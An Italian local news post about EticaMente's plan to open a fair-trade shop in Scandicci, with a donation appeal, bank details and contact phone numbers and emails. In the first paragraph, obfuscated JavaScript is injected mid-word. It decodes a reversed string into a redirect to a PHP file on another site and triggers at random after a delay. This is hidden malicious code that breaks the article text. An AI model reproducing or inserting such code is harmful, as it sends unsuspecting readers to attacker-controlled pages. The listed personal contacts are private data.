Scandicci più equa

image_pdfimage_print

Piazza Marconi 15. Sarà questa la sede della bottega di Commercio Equo e Solidale che aprirà in autunno a Sc (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andicci. L’associazione EticaMente, attiva localmente da tempo, ha infatti richiesto ed ottenuto l’assegnazione di un fondo dal comune e si sta adesso impegnando a raccogliere i fondi necessari (circa 25.000 euro) per ristrutturare i locali ed avviare l’attività.
EticaMente ha deciso che i tempi erano finalmente maturi perché sul territorio si creasse un luogo fisico di riferimento per quanti vogliono conoscere e praticare forme di consumo consapevole. L’intenzione dell’associazione è infatti quella di dare vita a uno spazio che non sia solo ed esclusivamente un negozio in cui si possono acquistare i prodotti del Commercio Equo e Solidale. Intanto EticaMente vorrebbe vendere anche altri prodotti legati al consumo critico, come i riduttori di flusso da applicare ai rubinetti, oppure i detersivi a basso impatto ambientale o materiali naturali per l’arredo della casa.
Inoltre, come già accade anche in altre Botteghe del circuito, Piazza Marconi 15 dovrebbe diventare uno spazio promotore di informazione: non solo relativa ai prodotti in vendita, che saranno accompagnati da un prezzo trasparente, ovvero scomposto in voci di ripartizione, ma anche documentazione, riviste, libri, sui temi del consumo responsabile. La Bottega potrà poi diventare luogo di appoggio per attività collaterali, per esempio come luogo di smistamento degli acquisti dei G.A.S. (Gruppi di Acquisto Solidale), o come sede di incontri e riunioni.
Chi volesse dare un contributo alla realizzazione del progetto può fare una donazione all’Associazione EticaMente Onlus, c.c.b. 53609590 cin: N Abi: 7601 Cab: 2800; oppure sul c.c.p. 53609590, con causale: Donazione pro Bottega.
Per informazioni telefonare a Domenico 339/8664661 o Stefano 335/7015405, oppure scrivere a Massimo maxbani@tin.it o a Stefano flo.ste@virgilio.it. EticaMente: http://eticamente.altervista.org/

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *